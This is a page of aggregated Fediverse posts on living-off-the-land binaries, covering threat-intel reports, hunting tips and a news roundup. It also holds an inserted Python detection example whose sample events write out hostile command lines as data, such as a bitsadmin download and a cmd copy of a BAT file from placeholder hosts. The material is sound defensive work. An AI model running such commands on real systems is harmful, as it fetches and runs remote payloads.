home.social

#lolbin — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #lolbin, aggregated by home.social.

  1. her living off the land techniques have inspired generations of hackers with #lolbin attacks as well
    #infosec

  2. RE: infosec.exchange/@netresec/115

    Here’s a good example of why you should have network egress filtering on your network. Nobody uses the finger protocol any more. But the binary still exists in Windows! And if you don’t block outbound port 79/tcp your users are at risk #cybersecurity #LOLBIN

  3. There's a new acronym out there, LOTS. It's the SaaS version of LOL (Living Off the Land). It stands for Living Off Trusted Sites. I've only seen it in a few blog posts, but wanted to put this out there.
    #LOTS #LOLbin #Infosec

  4. Cisco Talos discloses a new Vietnamese financially-motivated actor dubbed CoralRaider, targeting victims in several Asian and Southeast Asian countries since at least 2023. They focus on stealing victims’ credentials, financial data, and social media accounts, including business and advertisement accounts. Known malware used are a QuasarRAT variant called RotBot, and XClient stealer. TTPs include abusing a legitimate service to host the C2 configuration file and uncommon living-off-the-land binaries (LoLBins), including Windows Forfiles.exe and FoDHelper.exe. IOC provided. 🔗 blog.talosintelligence.com/cor

    #CoralRaider #Vietnam #cybercrime #threatintel #IOC #QuasarRAT #RotBot #XClient #LoLBin

  9. Happy Friday everyone!

    The Threat Hunters at Group-IB share their tactics and techniques, this time when they are hunting for suspicious or malicious activity related to adversaries leveraging the living-off-the-land binary (#LOLBIN) wmic.exe, or Windows Management Instrumentation, or WMI. What I really like about this, aside from some experts sharing their knowledge, is that they not only touch on the execution but share other ways to hunt for follow-on activity, for example, what activity looks like when WMI is the parent process. These are always a great read! Enjoy and Happy Hunting!

    Hunting Rituals #4: Threat hunting for execution via Windows Management Instrumentation
    group-ib.com/blog/hunting-ritu

    #CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

  10. LNK file with "Copy" command used as a simple downloader for #Xworm #RAT and #AsyncRAT. The source argument of the copy command is a network location in this case, which effectively means that the remote BAT file is downloaded to the victim computer.

    LNK files are often used for malicious purposes. For example, they can be delivered as email attachments and can run malicious PowerShell commands. However, this one is a demonstration of the KISS principle - simple and stupid (or actually smart) usage of an essential utility.

    Ref: app.any.run/tasks/1cbca783-832

    #malware #malwareanalysis #lolbin #sandbox #AnyRun

  11. Another week, another newsletter - catch up on the week's infosec news here:

    opalsec.substack.com/p/soc-gou

    Researchers have found that nearly two years on, 2 in 3 installs of #Apache #Superset are still using default Flask Secret Keys - a configuration flaw which would allow an attacker to forge session cookies and access said servers with full administrative privileges.

    #Kritec is a commodity #skimmer found installed on compromised #Magecart sites, with its code heavily obfuscated and customised to match the site's aesthetic in order to con users out of credit card details.

    #FIN7 look to be popping instances of the #Veeam backup software that are unpatched for a recent vulnerability; a revised #ViperSoftX #infostealer now targets #1password and #keepass password vaults, and #TA505 deliver a new infostealer through a #GoogleAds campaign.

    #LockBit & #CL0P ransomware affiliates have been abusing a month-old vulnerability in the #PaperCut print management software to drop ransomware. With the cat out of the bag, security researchers have decided now is a great time to drop a PoC exploit on Github - I mean, why not let the skiddies get in on the action too, right?

    The #blueteam have some great research worth reading on #Smishing via #AWS; detections for #SliverC2 and different implementations of #PsExec, as well as #Sigma integration for #SentinelOne and a #KQL hack for monitoring LOLDrivers.

    Have a great week ahead folks, I hope this newsletter proves helpful!

    opalsec.substack.com/p/soc-gou

    #infosec #cyber #news #newsletter #cybernews #infosec #infosecnews #informationsecurity #cybersecurity #hacking #security #technology #hacker #vulnerability #vulnerabilities #malware #ransomware #affiliate #dfir #soc #threatintel #threatintelligence #threathunting #detection #threatdetection #detectionengineering #flask #python #fraud #malvertising #clop #PoC #exploit #securityresearch #LOLBAS #LOLBIN #BYOVD

  16. The #SophosMDR team also discovered cases where threat actors targeting #PaperCut were abusing the bitsadmin.exe Windows application to download payloads. #BITSAdmin is commonly abused by active adversaries as a "living off the land binary" or #LOLbin, handy for accomplishing the task of downloading payloads.

    The tools exploited in the attacks have included what we refer to as “dual-use agents,” used both legitimately by IT staff and maliciously by attackers. At the time of writing, Sophos has observed the abuse of #AnyDesk, #Atera, #Synchro, #TightVNC, #NetSupport, and #DWAgent remote management tools across multiple campaigns.

    4/6
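An added defender-side example, not taken from any of the posts above: a small detection pass over constructed Sysmon-style process-create and network-connect events, with one rule per LOLBin pattern the posts describe (finger.exe reaching out on 79/tcp, bitsadmin.exe downloading, cmd.exe copying from a network share as in the LNK downloader, and a shell with WMI as its parent). The field names, paths, hosts and rule names are assumptions and placeholders, not indicators from any post.

```python
import re

# Constructed sample telemetry, not taken from any post above. Field names follow
# the Sysmon convention (EventID 1 = process create, EventID 3 = network connect);
# hosts and paths are placeholders, not real indicators.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c copy \\203.0.113.5\pub\update.bat %TEMP%\u.bat"},  # LNK-style downloader
    {"EventID": 1, "Image": r"C:\Windows\System32\bitsadmin.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"bitsadmin /transfer j /download /priority high http://198.51.100.7/p.exe C:\Users\Public\p.exe"},
    {"EventID": 3, "Image": r"C:\Windows\System32\finger.exe",
     "DestinationIp": "198.51.100.9", "DestinationPort": 79},  # finger.exe egress on 79/tcp
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Process"},  # shell spawned under WMI
    # benign activity that must not fire
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c copy C:\Users\alice\notes.txt D:\backup\notes.txt"},
    {"EventID": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "203.0.113.80", "DestinationPort": 443},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
WMI_PARENTS = {"wmiprvse.exe", "wmic.exe"}
COPY_FROM_UNC = re.compile(r'\bcopy\s+"?\\\\[^\s"]+', re.IGNORECASE)  # copy source is a \\share path
BITS_DOWNLOAD = re.compile(r"/(transfer|download|addfile)\b", re.IGNORECASE)

def image_name(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def rule_finger_egress(ev):
    """finger.exe connecting to 79/tcp: the protocol is dead, the binary is not."""
    return ev["EventID"] == 3 and image_name(ev["Image"]) == "finger.exe" and ev.get("DestinationPort") == 79

def rule_bitsadmin_download(ev):
    """bitsadmin.exe invoked with a transfer/download verb."""
    return (ev["EventID"] == 1 and image_name(ev["Image"]) == "bitsadmin.exe"
            and BITS_DOWNLOAD.search(ev.get("CommandLine", "")) is not None)

def rule_copy_from_unc(ev):
    """cmd.exe 'copy' whose source argument is a network share (remote file fetched as a local copy)."""
    return (ev["EventID"] == 1 and image_name(ev["Image"]) == "cmd.exe"
            and COPY_FROM_UNC.search(ev.get("CommandLine", "")) is not None)

def rule_wmi_spawns_shell(ev):
    """A shell whose parent is the WMI provider host or wmic.exe."""
    return (ev["EventID"] == 1 and image_name(ev.get("ParentImage", "")) in WMI_PARENTS
            and image_name(ev["Image"]) in SHELLS)

RULES = [rule_finger_egress, rule_bitsadmin_download, rule_copy_from_unc, rule_wmi_spawns_shell]

def detect(events):
    """Return (event index, rule name) pairs for every event that trips a rule."""
    return [(i, r.__name__) for i, ev in enumerate(events) for r in RULES if r(ev)]
```

Each rule is deliberately narrow; in production these are starting points to tune against your own baseline of legitimate bitsadmin, WMI and share-copy usage.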

  21. I've just started looking at the #XCyclopedia as a source of inspiration - it has really handy enrichment from a variety of external #LOLBin repositories to see potential misuse examples. It has even started enumerating COM objects which is cool.